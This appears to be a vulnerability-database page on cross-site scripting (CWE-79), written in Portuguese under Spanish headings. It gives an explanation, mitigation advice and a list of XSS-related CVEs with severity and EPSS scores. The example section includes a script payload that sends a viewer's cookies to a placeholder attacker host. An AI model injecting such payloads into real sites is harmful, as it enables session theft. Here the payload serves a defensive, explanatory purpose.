Fallos del tipo CWE-79

28.777 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-0325MEDIUMUvdesk version 1.1.1 allows an unauthenticated remote attacker to exploit a stored XSS in the application. This is possible because the applEPSS 0.7%CVE-2022-1909CRITICALCross-site Scripting (XSS) - Stored in causefx/organizrEPSS 0.7%CVE-2024-52552HIGHJenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing the job name with JavaScript on the Authorization view, resEPSS 0.7%CVE-2016-10537—backbone is a module that adds in structure to a JavaScript heavy application through key-value pairs and custom events connecting to your REPSS 0.7%CVE-2023-38359MEDIUMIBM Cognos Analytics cross-site scriptingEPSS 0.7%CVE-2023-24494MEDIUMA stored cross-site scripting (XSS) vulnerability exists in Tenable.sc due to improper validation of user-supplied input before returning itEPSS 0.7%CVE-2021-24900—Ninja Tables < 4.1.8 - Admin+ Stored Cross-Site Cross-Site ScriptingEPSS 0.7%CVE-2022-38220MEDIUMAn XSS vulnerability exists within Quest KACE Systems Management Appliance (SMA) through 12.1 that may allow remote injection of arbitrary wEPSS 0.7%CVE-2025-46812LOWTrix vulnerable to Cross-site Scripting on copy & pasteEPSS 0.7%CVE-2026-15094MEDIUMWP Hotel Booking <= 2.3.2 - Reflected Cross-Site Scripting via 'check_in_date' ParameterEPSS 0.7%CVE-2024-3541LOWCampcodes Church Management System admin_user.php cross site scriptingEPSS 0.7%CVE-2024-7982CRITICALRegistrations for The Events Calendar < 2.12.4 - Unauthenticated Stored XSSEPSS 0.7%CVE-2025-10370MEDIUMMiczFlor RPi-Jukebox-RFID userScripts.php cross site scriptingEPSS 0.7%CVE-2022-46391MEDIUMAWStats 7.x through 7.8 allows XSS in the hostinfo plugin due to printing a response from Net::XWhois without proper checks.EPSS 0.7%CVE-2024-1935HIGHGiveaways and Contests by RafflePress <= 1.12.5 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.7%CVE-2022-22181HIGHJunos OS: J-Web can be compromised through reflected XSS attacksEPSS 0.7%CVE-2020-14320—In Moodle before 3.9.1, 3.8.4 and 3.7.7, the filter in the admin task log required extra sanitizing to prevent a reflected XSS risk.EPSS 0.7%CVE-2023-28313MEDIUMMicrosoft Dynamics 365 Customer Voice Cross-Site Scripting VulnerabilityEPSS 0.7%CVE-2022-50905MEDIUMe107 CMS v3.2.1 - Reflected XSS via Comment FlowEPSS 0.7%CVE-2021-24871—Get Custom Field Values < 4.0.1 - Contributor+ Stored Cross-Site ScriptingEPSS 0.7%